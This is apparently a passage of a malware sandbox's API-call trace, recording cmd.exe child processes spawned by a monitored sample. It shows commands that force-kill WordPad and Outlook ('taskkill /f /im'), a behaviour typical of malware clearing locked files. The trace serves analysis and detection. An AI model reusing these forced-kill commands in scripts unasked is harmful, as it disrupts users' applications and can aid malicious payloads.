(_String1="taskkill", _String2="PATH") returned 4 [0060.670] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.670] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.670] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.670] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.670] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.670] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.670] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.670] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.670] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.670] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.670] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.670] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.670] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.670] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.670] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.670] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.670] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.670] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.670] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.670] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.670] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.670] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.670] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.670] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.670] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x210) returned 0x403080 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x42) returned 0x403298 [0060.671] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x418) returned 0x3f07f0 [0060.671] SetErrorMode (uMode=0x0) returned 0x0 [0060.671] SetErrorMode (uMode=0x1) returned 0x0 [0060.671] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f07f8, lpFilePart=0x38edf8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38edf8*="Desktop") returned 0x25 [0060.671] SetErrorMode (uMode=0x0) returned 0x1 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f07f0, Size=0x66) returned 0x3f07f0 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f07f0) returned 0x66 [0060.671] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.671] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x120) returned 0x4032e8 [0060.671] GetProcessHeap () returned 0x3f0000 [0060.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x238) returned 0x3f0860 [0060.677] GetProcessHeap () returned 0x3f0000 [0060.678] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x3f0860, Size=0x122) returned 0x3f0860 [0060.678] GetProcessHeap () returned 0x3f0000 [0060.678] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f0860) returned 0x122 [0060.678] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.678] GetProcessHeap () returned 0x3f0000 [0060.678] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe0) returned 0x403410 [0060.678] GetProcessHeap () returned 0x3f0000 [0060.678] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x403410, Size=0x76) returned 0x403410 [0060.678] GetProcessHeap () returned 0x3f0000 [0060.678] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x403410) returned 0x76 [0060.678] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.679] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x38eb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38eb74) returned 0xffffffff [0060.679] GetLastError () returned 0x2 [0060.679] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x38eb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38eb74) returned 0xffffffff [0060.679] GetLastError () returned 0x2 [0060.679] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.679] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x38eb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38eb74) returned 0x403490 [0060.679] GetProcessHeap () returned 0x3f0000 [0060.679] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x14) returned 0x4034d0 [0060.679] FindClose (in: hFindFile=0x403490 | out: hFindFile=0x403490) returned 1 [0060.679] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x38eb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38eb74) returned 0xffffffff [0060.679] GetLastError () returned 0x2 [0060.679] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x38eb74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38eb74) returned 0x403490 [0060.680] GetProcessHeap () returned 0x3f0000 [0060.680] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4034d0, Size=0x4) returned 0x4034d0 [0060.680] FindClose (in: hFindFile=0x403490 | out: hFindFile=0x403490) returned 1 [0060.680] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.680] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.680] GetConsoleTitleW (in: lpConsoleTitle=0x38f06c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.680] InitializeProcThreadAttributeList (in: lpAttributeList=0x38eef4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x38efbc | out: lpAttributeList=0x38eef4, lpSize=0x38efbc) returned 1 [0060.680] UpdateProcThreadAttribute (in: lpAttributeList=0x38eef4, dwFlags=0x0, Attribute=0x60001, lpValue=0x38efb4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x38eef4, lpPreviousValue=0x0) returned 1 [0060.680] GetStartupInfoW (in: lpStartupInfo=0x38eeb0 | out: lpStartupInfo=0x38eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.680] GetProcessHeap () returned 0x3f0000 [0060.680] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x403490 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.680] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.681] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.681] GetProcessHeap () returned 0x3f0000 [0060.681] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x403490 | out: hHeap=0x3f0000) returned 1 [0060.681] GetProcessHeap () returned 0x3f0000 [0060.681] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa) returned 0x3fff18 [0060.682] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.683] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im wordpad.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x38ef50*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im wordpad.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38ef9c | out: lpCommandLine="taskkill /f /im wordpad.exe", lpProcessInformation=0x38ef9c*(hProcess=0x78, hThread=0x74, dwProcessId=0x814, dwThreadId=0x3c0)) returned 1 [0060.971] CloseHandle (hObject=0x74) returned 1 [0060.972] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.972] GetProcessHeap () returned 0x3f0000 [0060.972] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x405f08 | out: hHeap=0x3f0000) returned 1 [0060.972] GetEnvironmentStringsW () returned 0x405f08* [0060.972] GetProcessHeap () returned 0x3f0000 [0060.972] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb36) returned 0x4040c8 [0060.972] FreeEnvironmentStringsW (penv=0x405f08) returned 1 [0060.972] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0071.019] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x38ee90 | out: lpExitCode=0x38ee90*=0x80) returned 1 [0071.020] CloseHandle (hObject=0x78) returned 1 [0071.020] _vsnwprintf (in: _Buffer=0x38efd8, _BufferCount=0x13, _Format="%08X", _ArgList=0x38ee9c | out: _Buffer="00000080") returned 8 [0071.020] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0071.020] GetProcessHeap () returned 0x3f0000 [0071.020] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4040c8 | out: hHeap=0x3f0000) returned 1 [0071.020] GetEnvironmentStringsW () returned 0x4040c8* [0071.020] GetProcessHeap () returned 0x3f0000 [0071.020] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x4095b0 [0071.020] FreeEnvironmentStringsW (penv=0x4040c8) returned 1 [0071.020] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0071.020] GetProcessHeap () returned 0x3f0000 [0071.020] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4095b0 | out: hHeap=0x3f0000) returned 1 [0071.020] GetEnvironmentStringsW () returned 0x4040c8* [0071.020] GetProcessHeap () returned 0x3f0000 [0071.020] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x4095b0 [0071.020] FreeEnvironmentStringsW (penv=0x4040c8) returned 1 [0071.021] GetProcessHeap () returned 0x3f0000 [0071.021] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3fff18 | out: hHeap=0x3f0000) returned 1 [0071.021] DeleteProcThreadAttributeList (in: lpAttributeList=0x38eef4 | out: lpAttributeList=0x38eef4) [0071.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0071.021] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.021] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0071.021] SetConsoleInputExeNameW () returned 0x1 [0071.021] GetConsoleOutputCP () returned 0x1b5 [0071.022] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0071.022] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.022] exit (_Code=128) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x14e40000" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im outlook.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0xb64 [0060.227] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ef950 | out: lpSystemTimeAsFileTime=0x3ef950*(dwLowDateTime=0x93d808d0, dwHighDateTime=0x1d57b18)) [0060.227] GetCurrentProcessId () returned 0xb60 [0060.227] GetCurrentThreadId () returned 0xb64 [0060.227] GetTickCount () returned 0x1149869 [0060.227] QueryPerformanceCounter (in: lpPerformanceCount=0x3ef948 | out: lpPerformanceCount=0x3ef948*=18044886321) returned 1 [0060.228] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.228] __set_app_type (_Type=0x1) [0060.228] __p__fmode () returned 0x74eb31f4 [0060.302] __p__commode () returned 0x74eb31fc [0060.302] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.302] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.303] GetCurrentThreadId () returned 0xb64 [0060.303] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb64) returned 0x60 [0060.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.303] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.303] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.303] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef8e0 | out: phkResult=0x3ef8e0*=0x0) returned 0x2 [0060.304] VirtualQuery (in: lpAddress=0x3ef917, lpBuffer=0x3ef8b0, dwLength=0x1c | out: lpBuffer=0x3ef8b0*(BaseAddress=0x3ef000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.304] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x3ef8b0, dwLength=0x1c | out: lpBuffer=0x3ef8b0*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.304] VirtualQuery (in: lpAddress=0x2f1000, lpBuffer=0x3ef8b0, dwLength=0x1c | out: lpBuffer=0x3ef8b0*(BaseAddress=0x2f1000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.304] VirtualQuery (in: lpAddress=0x2f3000, lpBuffer=0x3ef8b0, dwLength=0x1c | out: lpBuffer=0x3ef8b0*(BaseAddress=0x2f3000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.304] VirtualQuery (in: lpAddress=0x3f0000, lpBuffer=0x3ef8b0, dwLength=0x1c | out: lpBuffer=0x3ef8b0*(BaseAddress=0x3f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0060.304] GetConsoleOutputCP () returned 0x1b5 [0060.304] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.304] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.304] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.304] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.305] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.305] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.305] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.306] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.306] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.307] GetEnvironmentStringsW () returned 0x472040* [0060.307] GetProcessHeap () returned 0x460000 [0060.307] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x472b18 [0060.307] FreeEnvironmentStringsW (penv=0x472040) returned 1 [0060.307] GetProcessHeap () returned 0x460000 [0060.307] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4) returned 0x470c78 [0060.307] GetEnvironmentStringsW () returned 0x472040* [0060.307] GetProcessHeap () returned 0x460000 [0060.307] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x4735f0 [0060.307] FreeEnvironmentStringsW (penv=0x472040) returned 1 [0060.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ee850 | out: phkResult=0x3ee850*=0x68) returned 0x0 [0060.307] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x0, lpData=0x3ee85c*=0x0, lpcbData=0x3ee854*=0x1000) returned 0x2 [0060.307] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x1, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.307] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x0, lpData=0x3ee85c*=0x1, lpcbData=0x3ee854*=0x1000) returned 0x2 [0060.307] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x0, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x40, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x40, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x0, lpData=0x3ee85c*=0x40, lpcbData=0x3ee854*=0x1000) returned 0x2 [0060.308] RegCloseKey (hKey=0x68) returned 0x0 [0060.308] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ee850 | out: phkResult=0x3ee850*=0x68) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x0, lpData=0x3ee85c*=0x40, lpcbData=0x3ee854*=0x1000) returned 0x2 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x1, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x0, lpData=0x3ee85c*=0x1, lpcbData=0x3ee854*=0x1000) returned 0x2 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x0, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x9, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x4, lpData=0x3ee85c*=0x9, lpcbData=0x3ee854*=0x4) returned 0x0 [0060.308] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ee858, lpData=0x3ee85c, lpcbData=0x3ee854*=0x1000 | out: lpType=0x3ee858*=0x0, lpData=0x3ee85c*=0x9, lpcbData=0x3ee854*=0x1000) returned 0x2 [0060.308] RegCloseKey (hKey=0x68) returned 0x0 [0060.308] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebac [0060.308] srand (_Seed=0x5d97ebac) [0060.308] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im outlook.exe" [0060.308] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im outlook.exe" [0060.309] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.309] GetProcessHeap () returned 0x460000 [0060.309] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472040 [0060.309] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x472048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.310] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.310] GetEnvironmentVariableW (in: lpName="PATHEXT", 